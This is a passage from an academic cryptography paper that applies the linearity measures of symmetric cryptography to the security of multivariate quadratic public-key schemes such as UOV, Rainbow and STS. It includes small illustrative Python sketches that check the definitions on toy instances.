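The underlying hardness assumption can be illustrated with a toy example (a hypothetical sketch, not any concrete scheme discussed in this paper): an MQ public key is a system of m quadratic polynomials in n variables over a finite field, here GF(2); evaluating it is cheap, but recovering a preimage is an instance of the MQ problem.

```python
import itertools
import random

# Toy MQ public key over GF(2): m quadratic polynomials in n variables.
# Each polynomial has quadratic coefficients, linear coefficients and a constant.

def random_mq_poly(n, rng):
    quad = {(i, j): rng.randrange(2)
            for i, j in itertools.combinations_with_replacement(range(n), 2)}
    lin = [rng.randrange(2) for _ in range(n)]
    const = rng.randrange(2)
    return quad, lin, const

def eval_poly(poly, x):
    # Evaluate one quadratic polynomial at x over GF(2): addition is XOR,
    # multiplication is AND.
    quad, lin, const = poly
    v = const
    for (i, j), c in quad.items():
        v ^= c & x[i] & x[j]
    for i, c in enumerate(lin):
        v ^= c & x[i]
    return v

rng = random.Random(42)
n, m = 6, 6
public_key = [random_mq_poly(n, rng) for _ in range(m)]

x = [rng.randrange(2) for _ in range(n)]    # secret preimage
y = [eval_poly(p, x) for p in public_key]   # public image of x
# Recovering x from (public_key, y) is an instance of the NP-hard MQ problem;
# a trapdoor scheme hides structure that makes inversion easy for the key owner.
```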
Many different MQ schemes emerged over the years,
most of which fall into two main categories - single field
schemes, including UOV (Unbalanced Oil and Vinegar) [1],
Rainbow [2], TTM (Tame Transformation Method) [3], STS
(Stepwise Triangular System) [4], MQQ-SIG (Multivariate
Quadratic Quasigroups - Signature scheme) [5], TTS (Tame
Transformation Signatures) [6], EnTTS (Enhanced TTS) [7]
and mixed field schemes including C∗ [8], SFLASH [9], HFE
(Hidden Field Equation) [10], MultiHFE [11][12], QUARTZ
[13]. Unfortunately, most of them have been successfully
cryptanalysed [4][14][15][16][17]. Three major types of attacks have proven devastating for MQ cryptosystems:
i. MinRank attacks – based on the problem of finding a low
rank linear combination of matrices, known as MinRank
[18]. Although NP-hard, the instances of MinRank arising
from MQ schemes are often easy, and provide a powerful
tool against single field schemes [4][14].
ii. Equivalent Keys attacks – based on finding an equivalent
key for the respective scheme. The concept was introduced
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
by Wolf and Preneel [19], and later further developed
by Thomae and Wolf [16] to the generalization of good
keys. The attacks on TTM [14], STS [4][16], HFE and
MultiHFE [15][17] can all be seen from this perspective.
iii. Differential attacks – based on specific invariants of the
differential of a given public key, such as the dimension of
the kernel, or some special symmetry. It was introduced
by Fouque et al. in [20] to break the perturbed version
of the C ∗ scheme PMI [21], and later also used in
[22][23][24][25].
Interestingly, the history of MQ cryptography has witnessed cases where, despite the attempt to inoculate a scheme
against some attack, the enhanced variant has fallen victim to
the same type of attacks. Probably, the most famous example
is the SFLASH [9] signature scheme, which was built using the minus modifier on the already broken C∗ [26], and was selected
by the NESSIE European Consortium [27] as one of the
three recommended public key signature schemes. It was later
broken by Dubois et al. in [24][25] using a similar differential
technique as in the original attack on C ∗ . Another example
is the case of Enhanced STS [28], which was designed to be resistant to the rank attacks that broke its predecessor STS. Even the authors themselves soon realized that this was not the case: the enhanced variant is vulnerable to a HighRank attack.
Such examples indicate that the traditional “break and
patch” practice in MQ cryptography should be replaced by
a universal security framework. Indeed, in the last few years,
several proposals have emerged that try to accomplish this
[29][30][31]. Notably, the last two particularly concentrate on
the properties of the differential of the used functions, a well
known cryptanalytic technique from symmetric cryptography.
We will show here that another well known measure from
symmetric cryptography, namely linearity, is fundamental for
the understanding of the security of MQ schemes.
A. Our Contribution
We propose a new general framework for the security of
MQ schemes with respect to attacks that exploit the existence
of linear subspaces. Our framework is based on two linearity
measures that we borrow from symmetric cryptography, used
to measure the resistance of symmetric primitives to linear
cryptanalysis (cf. Matsui’s attack on the DES cipher [32]). To
our knowledge, this is the first time that the notion of linearity
has been used to analyse the security of MQ schemes.
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
In particular, we take the linearity measure for vectorial
functions introduced by Nyberg [33] already in 1992, and
the (s, t)–linearity measure introduced recently by Boura and
Canteaut [34] at FSE’13, and adopt them suitably in the
context of MQ cryptography. We extend the first to a new
notion of strong (s, t)–linearity in order to include an additional important parameter of the size of the vector subspace
of the components of the function that have common linear
space. We show that strong (s, t)–linearity and (s, t)–linearity
are intrinsically connected to the security of MQ schemes,
and can be used to explain almost all attacks on single field
schemes, such as rank attacks, good keys attacks and attacks on
oil and vinegar schemes. Indeed this is possible, since all these
attacks share a common characteristic: They try to recover a
subspace with respect to which the public key of an MQ
scheme is linear. Therefore they can all be considered as linear
attacks on MQ schemes.
We devise two generic attacks that separate the linear
subspaces, and that are a generalization of the aforementioned
known attacks. We present one of the possible modellings of
the attacks using system solving techniques, although other
techniques are possible as well. Using the properties of strong
(s, t)–linearity and (s, t)–linearity, we show what are the best
strategies for the attacks. Notably, the obtained systems of
equations are equivalent to those that can be obtained using
good keys [16], a technique based on equivalent keys and
missing cross terms. By this we show that our new framework
provides a different, elegant perspective on why good keys
exist, and why they are so powerful in cryptanalysis.
Moreover, we use our framework to explain various pitfalls regarding design choices of MQ schemes and the success of the linear attacks against them. Finally, we argue that
linearity can be used as a solid measure for the susceptibility
of MQ schemes to linear attacks, and also as a necessary tool
for prudent design practice in MQ cryptography.
B. Organization of the Paper
The paper is organized as follows. In Section II, we briefly
introduce the design principles of MQ schemes and also
recall the well known measure of nonlinearity of functions.
In the next Section III, we introduce the notion of strong
(s, t)–linearity, which is basically an extension of the standard
linearity measure and review the recently introduced (s, t)–
linearity measure. In Sections IV and V, we show how the
two linearity measures fit in the context of MQ cryptography.
Some discussion on the matter proceeds in Section VI, and the
conclusions are presented in Section VII.
II. PRELIMINARIES
Throughout the text, F_q will denote the finite field of q elements, where q = 2^d, and a = (a_1, ..., a_n)^⊺ will denote a vector from F_q^n.
A. Vectorial Functions and Quadratic Forms
Definition 1: Let n, m be two positive integers. The functions from F_q^n to F_q^m are called (n, m) functions or vectorial functions. For an (n, m) function f = (f_1, ..., f_m), the f_i are called the coordinate functions of f.
Classically, a quadratic form

f(x_1, ..., x_n) = Σ_{1≤i≤j≤n} γ_ij x_i x_j : F_q^n → F_q
can be written as x^⊺ F x using its matrix representation F. This matrix is constructed differently depending on the parity of the field characteristic. In odd characteristic, F is chosen to be a symmetric matrix, where F_ij = γ_ij/2 for i ≠ j and F_ij = γ_ij for i = j. Over fields F_q of even characteristic, F cannot be chosen in this manner, since (γ_ij + γ_ji) x_i x_j = 0 for i ≠ j. Instead, let F̃ be the uniquely defined upper-triangular representation of f, i.e., F̃_ij = γ_ij for i ≤ j. Now, we obtain a symmetric form by F := F̃ + F̃^⊺. Note that, in this case, only the upper-triangular part represents the according polynomial, and F is always of even rank.
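To make the even-characteristic construction concrete, here is a minimal Python sketch over F_2 (the dimension n = 5 and the random form are illustrative assumptions): it builds the upper-triangular F̃, forms F = F̃ + F̃^⊺, and checks the symmetry, zero diagonal, and even rank noted above.

```python
import random

random.seed(1)
n = 5  # toy dimension (an assumption for illustration)

# Upper-triangular representation F~ of a random quadratic form over F_2.
Ft = [[random.randint(0, 1) if i <= j else 0 for j in range(n)] for i in range(n)]

# Symmetric form F := F~ + F~^T (addition over F_2 is XOR).
F = [[Ft[i][j] ^ Ft[j][i] for j in range(n)] for i in range(n)]

def rank_gf2(M):
    """Rank of a binary matrix via Gaussian elimination over F_2."""
    M = [row[:] for row in M]
    rank = 0
    for col in range(len(M[0])):
        piv = next((r for r in range(rank, len(M)) if M[r][col]), None)
        if piv is None:
            continue
        M[rank], M[piv] = M[piv], M[rank]
        for r in range(len(M)):
            if r != rank and M[r][col]:
                M[r] = [a ^ b for a, b in zip(M[r], M[rank])]
        rank += 1
    return rank

# F is symmetric with zero diagonal (the diagonal of F~ cancels out), ...
assert all(F[i][j] == F[j][i] for i in range(n) for j in range(n))
assert all(F[i][i] == 0 for i in range(n))
# ... and, as noted in the text, such a matrix always has even rank.
assert rank_gf2(F) % 2 == 0
```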
B. MQ Cryptosystems
The public key of an MQ cryptosystem is usually given by an (n, m) function P(x) = (p_1(x), ..., p_m(x)) : F_q^n → F_q^m, where

p_s(x) = Σ_{1≤i≤j≤n} γ̃_ij^(s) x_i x_j + Σ_{i=1}^n β̃_i^(s) x_i + α̃^(s)

for every 1 ≤ s ≤ m, and where x = (x_1, ..., x_n)^⊺.
The public key P is obtained by masking a structured central (n, m) function F = (f_1, ..., f_m) using two secret linear transformations S ∈ GL_n(F_q) and T ∈ GL_m(F_q), and is defined as P = T ◦ F ◦ S. We denote by P^(s) and F^(s) the (n × n) matrices describing the homogeneous quadratic part of p_s and f_s, respectively.
Example 1:
i. The internal map of UOV [1] is defined as F : F_q^n → F_q^m, with central polynomials

f_s(x) = Σ_{i∈V, j∈V} γ_ij^(s) x_i x_j + Σ_{i∈V, j∈O} γ_ij^(s) x_i x_j + Σ_{i=1}^n β_i^(s) x_i + α^(s),   (1)

for every s = 1, ..., m, where n = v + m, and V = {1, ..., v} and O = {v + 1, ..., n} denote the index sets of the vinegar and oil variables, respectively. The public map P is obtained by P = F ◦ S, since the affine T is not needed (indeed, any component w^⊺ · F has again the form (1)).
ii. The internal map F : F_{2^n} → F_{2^n} of C∗ [8] is defined by F(x) = x^(2^ℓ + 1), where gcd(2^ℓ + 1, 2^n − 1) = 1. This condition ensures that F is bijective.
iii. The representatives of the family of Stepwise Triangular Systems (STS) [4] have an internal map F : F_q^n → F_q^m defined as follows. Let L be the number of layers, and let r_i, 0 ≤ i ≤ L, be integers such that 0 = r_0 < r_1 < · · · < r_L = n. The central polynomials in the k-th layer are defined by

f_i(x_1, ..., x_n) = f_i(x_1, ..., x_{r_k}),   r_{k−1} + 1 ≤ i ≤ r_k.
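As a small sanity check of Example 1.i, the following Python sketch (toy sizes v = 4, m = 3 are an assumption; arithmetic over F_2) builds UOV-style central matrices with no oil-times-oil terms and verifies that the quadratic part vanishes on the oil space, so the central map is linear there.

```python
import itertools
import random

random.seed(2)
v, m = 4, 3   # vinegar and oil counts (toy sizes, an assumption)
n = v + m     # 0-based here: vinegar indices 0..v-1, oil indices v..n-1

# One upper-triangular central matrix per polynomial: every quadratic term
# contains at least one vinegar variable (no oil*oil monomials).
def central_matrix():
    M = [[0] * n for _ in range(n)]
    for i in range(v):            # i is always a vinegar index
        for j in range(i, n):
            M[i][j] = random.randint(0, 1)
    return M

Fs = [central_matrix() for _ in range(m)]

def quad(M, x):
    """Quadratic part of a central polynomial, evaluated over F_2."""
    return sum(M[i][j] * x[i] * x[j] for i in range(n) for j in range(n)) % 2

# Restricted to the oil space (vinegar coordinates set to 0), the quadratic
# part of every f_s vanishes.
for M in Fs:
    for oil in itertools.product([0, 1], repeat=m):
        assert quad(M, [0] * v + list(oil)) == 0
```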
We briefly describe two important cryptanalytic tools in MQ cryptography that are of particular interest for us.
1) The MinRank Problem: The problem of finding a low-rank linear combination of matrices is a well-known NP-hard linear algebra problem [35], known in cryptography as MinRank [18]. It has been shown that it underlies the security of several MQ cryptographic schemes [4][14][15]. It is defined as follows.

MinRank MR(n, r, k, M_1, ..., M_k)
Input: n, r, k ∈ N, where M_1, ..., M_k ∈ M_{n×n}(F_q).
Question: Find – if any – a k-tuple (λ_1, ..., λ_k) ∈ F_q^k \ {(0, 0, ..., 0)} such that

Rank( Σ_{i=1}^k λ_i M_i ) ≤ r.
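For intuition, a brute-force MinRank solver over F_2 can be sketched in a few lines (exponential in k, so toy instances only; the planted instance below is an assumption for illustration):

```python
import itertools
import random

random.seed(3)

def rank_gf2(M):
    """Rank of a binary matrix via Gaussian elimination over F_2."""
    M = [row[:] for row in M]
    rank = 0
    for col in range(len(M[0])):
        piv = next((r for r in range(rank, len(M)) if M[r][col]), None)
        if piv is None:
            continue
        M[rank], M[piv] = M[piv], M[rank]
        for r in range(len(M)):
            if r != rank and M[r][col]:
                M[r] = [a ^ b for a, b in zip(M[r], M[rank])]
        rank += 1
    return rank

def minrank_bruteforce(mats, r):
    """Try all nonzero lambda-tuples over F_2 (exponential; toy sizes only)."""
    n, k = len(mats[0]), len(mats)
    for lam in itertools.product([0, 1], repeat=k):
        if not any(lam):
            continue
        S = [[0] * n for _ in range(n)]
        for l, M in zip(lam, mats):
            if l:
                S = [[a ^ b for a, b in zip(ra, rb)] for ra, rb in zip(S, M)]
        if rank_gf2(S) <= r:
            return lam
    return None

# A planted instance: M1 has rank 1, so a solution exists for r = 1.
n = 4
M1 = [[1 if i == 0 and j == 0 else 0 for j in range(n)] for i in range(n)]
M2 = [[random.randint(0, 1) for _ in range(n)] for _ in range(n)]
sol = minrank_bruteforce([M1, M2], 1)
assert sol is not None
```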
2) Good Keys: The concept of equivalent keys formally
introduced by Wolf and Preneel in [36] is fundamentally
connected to the security of MQ schemes. In essence, any key
that preserves the structure of the secret map is an equivalent
key. This natural notion was later generalized by Thomae and
Wolf [16] to the concept of good keys that only preserve some
of the structure of the secret map. Good keys improve the
understanding of the level of applicability of MinRank against
MQ schemes, and are a powerful tool for cryptanalysis. Good
keys are defined as follows.
Let k, 1 ≤ k ≤ m, and let F = {f_1, ..., f_m} be a set of polynomials of F_q[x_1, ..., x_n]. Let I^(k) ⊆ {x_i x_j | 1 ≤ i ≤ j ≤ n} be a subset of the degree-2 monomials, and let F_I = {(f_1)_{I^(1)}, ..., (f_m)_{I^(m)}}, where (f_k)_{I^(k)} := Σ_{x_i x_j ∈ I^(k)} γ_ij x_i x_j.
C. Linearity of Vectorial Functions
Linearity is one of the most important measures for the strength of an (n, m) function for use in symmetric cryptographic primitives. We provide here some well-known results about this notion.
Definition 3 ([33]): The linearity of an (n, m) function f is measured using its Walsh transform, and is given by

L(f) = max_{w ∈ F_q^m \ {0}, u ∈ F_q^n} | Σ_{x ∈ F_q^n} (−1)^(w^⊺·f(x) + u^⊺·x) |.
The nonlinearity of an (n, m) function f is the Hamming distance between the set of nontrivial components {w^⊺ · f | w ∈ F_q^m \ {0}} of f and the set of all affine functions. It is given by

N(f) = (q − 1)(q^(n−1) − (1/q) L(f)).
Definition 4: A vector w ∈ F_q^n is called a linear structure of an (n, m) function f if the derivative D_w f(x) = f(x + w) − f(x) is constant, i.e., if

f(x + w) − f(x) = f(w) − f(0)

for all x ∈ F_q^n. The space generated by the linear structures of f is called the linear space of f.
Nyberg [33] proved the following results.
Proposition 1 ([33]): The dimension of the linear space of an (n, m) function is invariant under bijective linear transformations of the input space and of the coordinates of the function.
Proposition 2 ([33]): Let x^⊺ F x be the matrix representation of a quadratic form f. Then, the linear structures of f form the linear subspace Ker(F).
Definition 2 ([16]): Let (F, S, T), (F′, S′, T′) ∈ F_q[x_1, ..., x_n]^m × GL_n(F_q) × GL_m(F_q). Let also J^(k) ⊊ I^(k) for all k, 1 ≤ k ≤ m, with at least one J^(k) ≠ ∅. We call (F′, S′, T′) a good key of (F, S, T) if and only if:

T ◦ F ◦ S = T′ ◦ F′ ◦ S′ ∧ F_J = F′_J.
The linear structures can provide a measure for the distance of the quadratic forms from the set of linear forms. Indeed, the link is given by the following theorem.
Theorem 1 ([33]): 1) Let x^⊺ F x be the matrix representation of a quadratic form f, and let Rank(F) = r. Then the linearity of f is L(f) = q^(n − r/2).
2) Let f be a quadratic (n, m) function, and let x^⊺ F_w x denote the matrix representation of a component w^⊺ · f. Then the linearity of f is L(f) = q^(n − r/2), where r = min{Rank(F_w) | w ∈ F_q^m \ {0}}.
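Theorem 1 can be checked by brute force for small Boolean examples. The sketch below (n = 4 over F_2; the two functions are assumptions chosen for illustration) computes L(f) from the Walsh transform of Definition 3 and compares it with 2^(n − r/2):

```python
import itertools

def walsh_linearity(f, n):
    """L(f) for a Boolean function f: F_2^n -> F_2, by brute force."""
    best = 0
    for u in itertools.product([0, 1], repeat=n):
        s = sum((-1) ** (f(x) ^ sum(a * b for a, b in zip(u, x)) % 2)
                for x in itertools.product([0, 1], repeat=n))
        best = max(best, abs(s))
    return best

n = 4
# f(x) = x1 x2 + x3 x4: its matrix representation has full rank r = 4,
# so Theorem 1 predicts L(f) = 2^(n - r/2) = 4 (a bent function).
f_bent = lambda x: x[0] * x[1] ^ x[2] * x[3]
assert walsh_linearity(f_bent, n) == 2 ** (n - 4 // 2)

# f(x) = x1 x2: rank r = 2, so L(f) = 2^(n - 1) = 8.
f_low = lambda x: x[0] * x[1]
assert walsh_linearity(f_low, n) == 2 ** (n - 2 // 2)
```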
It is well known that the linearity of an (n, m) function is bounded from below by the value L(f) ≥ q^(n/2), known as the covering radius bound. It is tight for every even n, and functions that reach the bound are known as bent functions. It is also known [37] that bent functions exist only for m ≤ n/2.
A class of quadratic bent functions that has been extensively studied in the literature is the class of Maiorana-McFarland bent functions [38]. In general, an (n, m) function from the Maiorana-McFarland class has the form f = (f_1, f_2, ..., f_m) : F_{2^(n/2)} × F_{2^(n/2)} → F_2^m, where each of the components f_i is
f_i(x, y) = L(π_i(x) y) + g_i(x),   (2)
where the π_i are functions on F_{2^(n/2)}, L is a linear function onto F_2^m, and the g_i are arbitrary (n/2, m) functions. Nyberg [37] showed that f is an (n, m)-bent function if every nonzero linear combination of the functions π_i, i ∈ {1, ..., m}, is a permutation on F_{2^(n/2)}.
Since the minimum linearity (maximum nonlinearity) is achieved only for m ≤ n/2, permutations cannot reach the covering radius bound. But they can reach the Sidelnikov-Chabaud-Vaudenay (SCV) bound [39], valid for m ≥ n − 1, which for m = n odd can be stated as: L(f) ≥ q^((n+1)/2). (n, n) functions, where n is odd, that reach the SCV bound with equality are called Almost Bent (AB) functions.
As a direct consequence of Theorem 1 and the aforementioned bounds, we have that quadratic (n, m) functions are
i. bent if and only if Rank(F_w) = n for every w^⊺ · f,
ii. almost bent if and only if Rank(F_w) = n − 1 for every w^⊺ · f.
III. STRONG (s, t)–LINEARITY AND (s, t)–LINEARITY
We will show in the next sections that linearity plays a
significant role for the security of MQ cryptosystems. However, in order to better frame it for use in MQ cryptography,
we introduce the following notion of strong (s, t)–linearity.
The motivation for this more precise measure comes from the
recently introduced notion of (s, t)–linearity [34], that will also
be discussed here in the context of MQ cryptography.
Definition 5: Let f be an (n, m) function. Then, f is said to be strongly (s, t)–linear if there exist two linear subspaces V ⊂ F_q^n, W ⊂ F_q^m with Dim(V) = s, Dim(W) = t, such that for all w ∈ W, V is a subspace of the linear space of w^⊺ · f.
Compared to the standard measure for linearity given in
Definition 3, that actually measures the size of the vector space
V , strong (s, t)–linearity also measures the size of the vector
space W . We will see that this is particularly important in
the case of MQ cryptosystems. We next provide some basic
properties about strong (s, t)–linearity.
Proposition 3: If a function is strongly (s, t)–linear, then it
is also strongly (s − 1, t)–linear, and strongly (s, t − 1)–linear.
Proof: Let f be strongly (s, t)–linear. Then there exist spaces V, W with Dim(V) = s and Dim(W) = t, such that
every a ∈ V is a linear structure of all the components w⊺ f ,
where w is a basis vector of W . From here, a is also a linear
structure of any subspace of W of dimension t − 1. Therefore,
f is also strongly (s, t − 1)–linear. Similarly, the elements of
any subspace of V of dimension s − 1 are linear structures of
all the components w⊺ f , and thus, f is also strongly (s−1, t)–
linear.
Proposition 4: Let f be a quadratic (n, m) function, and let V ⊂ F_q^n and W ⊂ F_q^m with Dim(V) = s, Dim(W) = t be two linear spaces. Then f is strongly (s, t)–linear with respect to V, W if and only if the function f_W corresponding to all components w^⊺ · f, w ∈ W can be written as

f_W(x, y) = g_W(x) + L_W(y)   (3)

where F_q^n is a direct sum of U and V, g_W : U → F_q^t is a quadratic function, and L_W : V → F_q^t is a linear function.
Proof: From Definition 5, f is strongly (s, t)–linear with
respect to V, W if and only if V is a subspace of the linear
space of w⊺ · f , for all w ∈ W . Now, for w a basis vector of
W , w⊺ · f can be written as w⊺ · f (x, y) = gw (x) + Lw (y)
where y ∈ V belongs to the linear space of w⊺ · f . Combining
all the components for a basis of W we obtain the form (3).
Proposition 5: Let f be a quadratic (n, m) function. Then
f is strongly (s, t)–linear with respect to V, W if and only
if the function fW corresponding to all components w⊺ · f ,
w ∈ W is such that all its derivatives Da w⊺ · f , with a ∈ V
are constant.
Recently, Boura and Canteaut [34] introduced a new measure for the propagation of linear relations through S-boxes,
called (s, t)-linearity.
Definition 6 ([34]): Let f be an (n, m) function. Then, f is said to be (s, t)–linear if there exist two linear subspaces V ⊂ F_q^n, W ⊂ F_q^m with Dim(V) = s, Dim(W) = t, such that for all w ∈ W, w^⊺ · f has degree at most 1 on all cosets of V.
Similarly as for strong (s, t)–linearity, it is true that
Proposition 6 ([34]): If a function is (s, t)–linear, then it
is also (s − 1, t)–linear, and (s, t − 1)–linear.
Boura and Canteaut [34] proved that any (s, t)–linear
function “contains” a function of the Maiorana-McFarland
class, in the following sense.
Proposition 7 ([34]): Let f be an (n, m) function, and let V ⊆ F_q^n and W ⊆ F_q^m with Dim(V) = s, Dim(W) = t be two linear spaces. Then f is (s, t)–linear with respect to V, W if and only if the function f_W corresponding to all components w^⊺ · f, w ∈ W can be written as

f_W = M(x) · y + G(x)

where F_q^n is the direct sum of U and V, G is a function from U to F_q^t, and M(x) is a t × s matrix whose coefficients are functions defined on U.
A useful characterization of (s, t)–linearity, resulting from the properties of the Maiorana-McFarland class, is through second-order derivatives defined by D_{a,b} f = D_a D_b f = D_b D_a f.
Proposition 8 ([34]): Let f be an (n, m) function. Then f
is (s, t)–linear with respect to V, W if and only if the function
fW corresponding to all components w⊺ · f , w ∈ W is such
that all its second order derivatives Da,b w⊺ · f , with a, b ∈ V
vanish.
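Proposition 8 is easy to test on a toy Maiorana-McFarland-shaped function (the specific f and the subspace V below are assumptions for illustration): all second-order derivatives in directions from V vanish, witnessing (2, 1)–linearity over F_2^4.

```python
import itertools

n = 4  # coordinates z = (x1, x2, y1, y2); a toy Maiorana-McFarland shape
f = lambda z: z[0] * z[2] ^ z[1] * z[3]   # f(x, y) = x1 y1 + x2 y2

def D2(f, a, b, z):
    """Second-order derivative D_a D_b f at z (all arithmetic over F_2)."""
    xor = lambda p, q: tuple(u ^ v for u, v in zip(p, q))
    return f(xor(xor(z, a), b)) ^ f(xor(z, a)) ^ f(xor(z, b)) ^ f(z)

# V is the y-subspace, of dimension s = 2; fixing x, f is linear in y.
V = [(0, 0, y1, y2) for y1 in (0, 1) for y2 in (0, 1)]

# Proposition 8: f is (2, 1)-linear w.r.t. V since all D_{a,b} f vanish
# for a, b in V.
for a in V:
    for b in V:
        for z in itertools.product([0, 1], repeat=n):
            assert D2(f, a, b, z) == 0
```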
The two measures of linearity, even though they measure different linear subspaces, are also interconnected. The following two propositions illustrate this connection.
Proposition 9: If a function is strongly (s, t)–linear, then
it is also (s, t)–linear.
Proposition 10: If a quadratic (n, m) function f is (⌈n/2⌉ + s, 1)–linear, then it is strongly (2s, 1)–linear.
Proof: From Proposition 3 of [34], we have that an (s, 1)–linear function has linearity L(f) ≥ q^s (this comes from the fact that the linearity of a function is lower bounded by the linearity of any of its components). Thus, if a quadratic (n, m) function is (⌈n/2⌉ + s, 1)–linear, then L(f) ≥ q^(⌈n/2⌉ + s). From Theorem 1, L(f) = q^(n − r/2), where r = min{Rank(F_w) | w ∈ F_q^m \ {0}}. From here, n − r/2 ≥ ⌈n/2⌉ + s, and further n − 2s ≥ r. Hence f is strongly (2s, 1)–linear.
In the next two sections, we will provide a general
framework for the security of MQ schemes against linear
cryptanalysis using the notions of strong (s, t)–linearity and
(s, t)–linearity.
IV. THE STRONG (s, t)–LINEARITY MEASURE FOR MQ SYSTEMS
In this section, we show that strong (s, t)–linearity is
fundamentally connected to the susceptibility of an MQ
scheme to MinRank attacks and good keys attacks.
From Proposition 2 we have the following theorem.
Theorem 2: Let f = (f_1, f_2, ..., f_m) be a quadratic (n, m) function, and let F_1, F_2, ..., F_m be the matrix representations of the coordinates of f. Then, the MinRank problem MR(n, r, m, F_1, F_2, ..., F_m) has a solution if and only if f is strongly (n − r, 1)–linear.
Proof: We see that v = (v_1, ..., v_m) ∈ F_q^m \ {0} is a solution to the MinRank problem MR(n, r, m, F_1, F_2, ..., F_m) if and only if Rank( Σ_{i=1}^m v_i F_i ) ≤ r, that is, if and only if Dim(Ker( Σ_{i=1}^m v_i F_i )) ≥ n − r, i.e., from Proposition 2, if and only if v^⊺ · f has at least n − r linearly independent linear structures. Taking W to be the space generated by the vector v, and V to be the linear space of v^⊺ · f, from Definition 5 the last is equivalent to f being strongly (n − r, 1)–linear.
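The equivalence in Theorem 2 can be illustrated over F_2 (the toy sizes and random coordinate forms below are assumptions): for a component v^⊺ · f with symmetric matrix F_v, every kernel vector of F_v is a linear structure, i.e., has a constant derivative.

```python
import itertools
import random

random.seed(6)
n, m = 4, 2
# Upper-triangular coordinate forms f_1, f_2 over F_2 (a toy example).
Fts = [[[random.randint(0, 1) if i <= j else 0 for j in range(n)]
        for i in range(n)] for _ in range(m)]

def f_coord(Ft, x):
    return sum(Ft[i][j] * x[i] * x[j] for i in range(n) for j in range(i, n)) % 2

def kernel_gf2(M):
    """All vectors w with M w = 0, by brute force (toy sizes only)."""
    return [w for w in itertools.product([0, 1], repeat=n)
            if all(sum(M[i][j] * w[j] for j in range(n)) % 2 == 0
                   for i in range(n))]

# Pick a nonzero component v.f; its symmetric matrix is F_v = F~_v + F~_v^T.
v = (1, 1)
Ftv = [[(v[0] * Fts[0][i][j] + v[1] * Fts[1][i][j]) % 2 for j in range(n)]
       for i in range(n)]
Fv = [[Ftv[i][j] ^ Ftv[j][i] for j in range(n)] for i in range(n)]
fv = lambda x: (v[0] * f_coord(Fts[0], x) + v[1] * f_coord(Fts[1], x)) % 2

# By Proposition 2, every kernel vector of F_v is a linear structure of
# v.f: the derivative D_w fv takes a single value over all x.
for w in kernel_gf2(Fv):
    diffs = {fv(tuple(a ^ b for a, b in zip(x, w))) ^ fv(x)
             for x in itertools.product([0, 1], repeat=n)}
    assert len(diffs) == 1
```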
Example 2: From Theorem 2, it is clear that bent functions
are resistant to MinRank attacks, since no linear combination
of the components of the function has smaller rank than n.
Thus, regarding MinRank attacks, bent functions are optimal
for use as a secret map in MQ cryptosystems.
Example 3: Regarding encryption MQ schemes, a natural conclusion would be that AB permutations are the most suitable for use. Among the most scrutinized AB permutations are the Gold functions, defined over F_{q^n} for odd n by:

f(x) = x^(q^ℓ + 1), gcd(q^ℓ + 1, q^n − 1) = 1, gcd(ℓ, n) = 1,

where the first condition guarantees balancedness, and the second AB-ness. Notably, one of the most famous MQ schemes, the C∗ scheme, uses an AB function, although there are variants that do not meet the second condition [21].
As mentioned before, AB functions have Rank(F_v) = n − 1 for any component v^⊺ · f. This means that each of the components has a linear space of dimension 1, and no two components share a linear space, i.e., AB functions are only strongly (1, 1)–linear. Hence, MinRank for r = n − 1 is trivially satisfied and does not reveal anything more about the structure of the map.
The example of Gold functions from Example 3 implies
that although MinRank on its own can be a good indicator
of a weakness in a scheme, it does not provide a sufficient
condition for mounting a successful attack. A better framework
for the applicability of MinRank is provided by the concept
of good keys (cf. Section II-B2). It should be emphasized that
the definition of good keys (Definition 2), does not explicitly
state the structure that is being preserved, thus, providing
a framework even for structures not yet discovered. On the
other hand, the motivation for good keys comes from the
Rainbow band separation attack [40], that exploits (among
others) a particular weakness connected to the presence of
linear structures in the secret map. Moreover, known attacks
that use MinRank, as well as other applications of good keys,
again take advantage of the same property. Hence, we give a
new definition for the special type of keys that separate the
space of linear structures. This definition comes as a direct
consequence of strong (s, t)–linearity. Later, we will also take
a look at another weakness that the Rainbow band separation
attack and its generalizations take advantage of, and we will
also define the corresponding keys. We will call both types of
keys separation keys.
Let V be a subspace of F_q^n of dimension k ≤ n, and let S_V be an invertible matrix such that k of its rows form a basis of V. We note that the rest of the rows of the matrix can be arbitrary, as long as the matrix is invertible.
Definition 7: Let (F, S, T), (F′, S′, T′) ∈ F_q[x_1, ..., x_n]^m × GL_n(F_q) × GL_m(F_q), and let P = T ◦ F ◦ S = T′ ◦ F′ ◦ S′. We call (F′, S′, T′) a strong (s, t) separation key for P if P is strongly (s, t)–linear with respect to two spaces V and W, Dim(V) = s, Dim(W) = t, and

S′ = S_V^⊺, T′ = T_W.
A strong (s, t) separation key separates the components of the public key that have a non-empty common linear space.
As a direct consequence of Definition 7 we have that:
Proposition 11: If (F ′ , S ′ , T ′ ) is a strong (s, t) separation
key for P, then it is also a good key for P.
Many MQ cryptosystems proposed so far have strong separation keys. As mentioned before, Rainbow [2] is one of the examples, but so are all STS cryptosystems ([3], [4]), and all MQ cryptosystems that combine a layered structure with other types of design principles, including among others Branched C∗ [41], MQQ-SIG [5], TTS [6], EnTTS [7], and MFE [42]. Table I summarizes the different strong separation keys for some of these schemes.
TABLE I. EXAMPLES OF STRONG (s, t) SEPARATION KEYS FOR SOME MQ CRYPTOSYSTEMS

scheme     | parameters                          | strong (s, t) separation keys
Branch. C∗ | (n_1, ..., n_b)                     | (Σ_i n_i, n − Σ_i n_i)
STS        | (r_1, ..., r_L)                     | (n − r_k, r_k), k = 1, ..., L − 1
Rainbow    | (v_1, o_1, o_2) = (18, 12, 12)      | (12, 12)
MQQ-SIG    | (q, d, n, r) = (2, 8, 160, 80)      | (k, 80 − k), k = 1, ..., 79
MFE        | (q^k, n, m) = ((2^256)^k, 12, 15)   | (2k, 10k), (4k, 4k), (6k, 2k), (8k, k)
EnTTS      | (n, m) = (32, 24)                   | (10, 14), (14, 10)
The known attacks on these systems can all be considered as separation key attacks involving different techniques and optimizations. The framework of strong (s, t)–linearity
